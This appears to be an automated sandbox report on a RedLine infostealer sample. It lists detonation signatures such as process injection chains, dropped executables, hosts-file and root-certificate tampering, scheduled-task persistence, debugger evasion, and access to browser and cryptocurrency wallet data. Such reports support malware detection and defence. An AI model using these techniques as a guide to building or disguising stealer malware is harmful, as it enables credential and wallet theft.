Malware Analysis Report

2025-01-18 09:28

Sample ID 230812-hgcb8acd8x
Target f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe
SHA256 f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8601e619b670c78673bb
Tags
redline logsdiller cloud (tg: @logsdillabot) evasion infostealer spyware stealer themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8601e619b670c78673bb

Threat Level: Known bad

The file f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe was found to be: Known bad.

Malicious Activity Summary

redline logsdiller cloud (tg: @logsdillabot) evasion infostealer spyware stealer themida

RedLine

Suspicious use of NtCreateUserProcessOtherParentProcess

Drops file in Drivers directory

Downloads MZ/PE file

Stops running service(s)

Loads dropped DLL

Reads user/profile data of web browsers

Themida packer

Executes dropped EXE

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Program Files directory

Launches sc.exe

Enumerates physical storage devices

Program crash

Unsigned PE

Suspicious use of WriteProcessMemory

Modifies system certificate store

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-12 06:42

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-12 06:42

Reported

2023-08-12 06:44

Platform

win7-20230712-en

Max time kernel

68s

Max time network

147s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1012 created 1268 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 1012 created 1268 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 1012 created 1268 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 1012 created 1268 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 1012 created 1268 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Windows\Temp\setup.exe N/A

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\mi.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cli.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3020 set thread context of 2216 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\Temp\setup.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cli.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1356 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 1356 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 1356 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 1356 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 1356 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 1356 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 1356 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 1356 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 1660 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 1660 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 1660 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 1660 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 1356 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 1356 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 1356 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 1356 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\f9a4620f23e2486480307c9a1ac92ee2783f2828bf8e8.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 3020 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3020 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3020 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3020 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3020 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3020 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3020 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3020 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3020 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3020 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 3020 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 3020 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 3020 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 2432 wrote to memory of 1520 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2432 wrote to memory of 1520 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2432 wrote to memory of 1520 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2432 wrote to memory of 1520 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 1476 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 1476 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 1476 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1520 wrote to memory of 2684 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
